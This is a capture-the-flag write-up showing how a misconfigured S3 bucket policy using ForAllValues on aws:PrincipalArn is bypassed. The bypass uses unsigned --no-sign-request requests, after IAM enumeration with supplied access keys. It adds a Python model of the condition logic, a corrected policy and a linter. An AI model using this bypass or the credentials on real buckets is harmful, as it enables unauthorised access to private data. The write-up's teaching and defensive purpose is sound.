Perfect Storage

Description

The intern is exploring S3 buckets to host internal documents. He insists that he has scoped the IAM policy correctly to restrict access solely to the admin. Prove the intern wrong by escalating your user privileges and accessing the secret document!

Attached File: user.txt

aws_access_key_id = AKIAU24SYXUWGFF2Y2GS
aws_secret_access_key = ylEfloqS+B+O56WesG7qg8fEl0F1WD79OyckBuTf

Solve

First, a quick sanity check that the credential works.

Since the challenge description mentions IAM, let's attempt IAM enumeration on the user.

aws iam list-attached-user-policies --user-name thisisauselessuserfortesting --profile perfect_storage

Doing standard enumeration, we noticed the user has the policy hackerman101 attached. Let's enumerate that policy now.

aws iam get-policy --policy-arn arn:aws:iam::332630900012:policy/hackerman101 --profile perfect_storage
aws iam get-policy-version --policy-arn arn:aws:iam::332630900012:policy/hackerman101 --version-id v2 --profile perfect_storage

In the IAM policy, we noticed that the user thisisauselessuserfortesting has a get-bucket permission for perfect-storage-7815696ecbf1c96.

However, when attempting to access the S3 bucket, we are met with an explicit deny in an identity-based policy.

Let's retrieve the bucket policy to see whether any statement there is explicitly denying our access.

aws s3api get-bucket-policy --bucket perfect-storage-7815696ecbf1c96 --profile perfect_storage

I have attached the prettified policy:

{
    "Policy": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Principal": "*",
                "Action": [
                    "s3:ListBucket",
                    "s3:GetObject"
                ],
                "Resource": [
                    "arn:aws:s3:::perfect-storage-7815696ecbf1c96/*",
                    "arn:aws:s3:::perfect-storage-7815696ecbf1c96"
                ],
                "Condition": {
                    "ForAllValues:StringLike": {
                        "aws:PrincipalArn": "arn:aws:iam::666666666666:user/admin"
                    }
                }
            }
        ]
    }
}

Here we can see that the bucket policy allows all principals (i.e. any user) to perform ListBucket and GetObject. However, there is a condition that the requesting principal's ARN must match arn:aws:iam::666666666666:user/admin.

The ForAllValues set operator is overly permissive here: according to the AWS documentation, ForAllValues also evaluates to true when the request contains no value at all for the condition key, and AWS warns against using it in an Allow statement with single-valued keys such as aws:PrincipalArn.

So if we can send a request that carries no PrincipalArn at all (an unsigned, anonymous request), the condition is satisfied and the Allow applies, bypassing the intended restriction.

aws s3 ls s3://perfect-storage-7815696ecbf1c96 --profile perfect_storage
aws s3 ls s3://perfect-storage-7815696ecbf1c96  --no-sign-request

Comparing the output of the two listings, the second one (with --no-sign-request) is able to bypass the policy.

aws s3 cp s3://perfect-storage-7815696ecbf1c96/flag.txt - --no-sign-request
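To make the ForAllValues behaviour concrete, here is an added example (not part of the original writeup, and not AWS's evaluator) that models how a condition block is evaluated when the condition key is missing from the request, and lints a bucket policy for the exact mistake above. It is a deliberately simplified model: only StringEquals/StringLike and the ForAllValues/ForAnyValue set operators are implemented, the Principal element is ignored, and the explicit Deny in the intern's identity policy is not modelled. The bucket ARN and the admin ARN come from the policy on this page; the intern's ARN and the request contexts are constructed for the example.

```python
"""Model of IAM set-operator conditions with an absent condition key, plus a
lint for ForAllValues applied to a single-valued key (simplified, not AWS's
own evaluation logic)."""
import fnmatch

BUCKET = "perfect-storage-7815696ecbf1c96"

# Policy as retrieved on the page: ForAllValues:StringLike on aws:PrincipalArn.
VULNERABLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:ListBucket", "s3:GetObject"],
        "Resource": [f"arn:aws:s3:::{BUCKET}/*", f"arn:aws:s3:::{BUCKET}"],
        "Condition": {"ForAllValues:StringLike": {
            "aws:PrincipalArn": "arn:aws:iam::666666666666:user/admin"}},
    }],
}

# Corrected policy: drop the set operator, so a missing key never matches.
FIXED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:ListBucket", "s3:GetObject"],
        "Resource": [f"arn:aws:s3:::{BUCKET}/*", f"arn:aws:s3:::{BUCKET}"],
        "Condition": {"StringEquals": {
            "aws:PrincipalArn": "arn:aws:iam::666666666666:user/admin"}},
    }],
}

# Constructed request contexts ({condition key: [values]}). An unsigned
# request has no principal, so its context carries no aws:PrincipalArn.
ADMIN_CONTEXT = {"aws:PrincipalArn": ["arn:aws:iam::666666666666:user/admin"]}
INTERN_CONTEXT = {"aws:PrincipalArn": [
    "arn:aws:iam::332630900012:user/thisisauselessuserfortesting"]}  # assumed ARN
ANONYMOUS_CONTEXT = {}

# Keys that carry at most one value per request; ForAllValues on these is the trap.
SINGLE_VALUED_KEYS = {"aws:PrincipalArn", "aws:PrincipalAccount", "aws:SourceIp", "aws:userid"}


def _match(op, request_value, policy_values):
    if op == "StringEquals":
        return request_value in policy_values
    if op == "StringLike":  # case-sensitive, * and ? wildcards
        return any(fnmatch.fnmatchcase(request_value, p) for p in policy_values)
    raise ValueError(f"unsupported operator {op}")


def condition_matches(condition, request_context):
    """True if every operator/key pair in the Condition block is satisfied."""
    for full_op, pairs in condition.items():
        set_op, _, base_op = full_op.partition(":")
        if not base_op:  # plain operator such as "StringLike", no set prefix
            set_op, base_op = None, full_op
        for key, policy_values in pairs.items():
            if isinstance(policy_values, str):
                policy_values = [policy_values]
            values = request_context.get(key, [])
            if set_op == "ForAllValues":
                # all() over an empty set is True: a request without the key passes.
                ok = all(_match(base_op, v, policy_values) for v in values)
            elif set_op == "ForAnyValue":
                ok = any(_match(base_op, v, policy_values) for v in values)
            else:
                # No set operator: a missing key means the condition is false.
                ok = bool(values) and _match(base_op, values[0], policy_values)
            if not ok:
                return False
    return True


def allowed(policy, action, request_context):
    """Simplified check: does any Allow statement for `action` have a matching Condition?"""
    for stmt in policy["Statement"]:
        actions = stmt["Action"] if isinstance(stmt["Action"], list) else [stmt["Action"]]
        if (stmt["Effect"] == "Allow" and action in actions
                and condition_matches(stmt.get("Condition", {}), request_context)):
            return True
    return False


def lint(policy):
    """Flag Allow statements that use ForAllValues on a single-valued key."""
    findings = []
    for i, stmt in enumerate(policy["Statement"]):
        if stmt.get("Effect") != "Allow":
            continue
        for full_op, pairs in stmt.get("Condition", {}).items():
            if full_op.startswith("ForAllValues:"):
                for key in pairs:
                    if key in SINGLE_VALUED_KEYS:
                        findings.append(
                            f"Statement {i}: {full_op} on single-valued key {key} "
                            "also matches requests that lack the key entirely")
    return findings


if __name__ == "__main__":
    for name, ctx in [("admin", ADMIN_CONTEXT), ("intern", INTERN_CONTEXT), ("anonymous", ANONYMOUS_CONTEXT)]:
        print(f"{name:>10}: vulnerable={allowed(VULNERABLE_POLICY, 's3:GetObject', ctx)} "
              f"fixed={allowed(FIXED_POLICY, 's3:GetObject', ctx)}")
    print(lint(VULNERABLE_POLICY) or "no findings")
```

Under this model the anonymous context is allowed by the page's policy but refused by the corrected one, while the admin is allowed by both; the lint reports the single offending statement. The same lint can be run over the output of get-bucket-policy across an account to find buckets with this pattern before someone else does.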
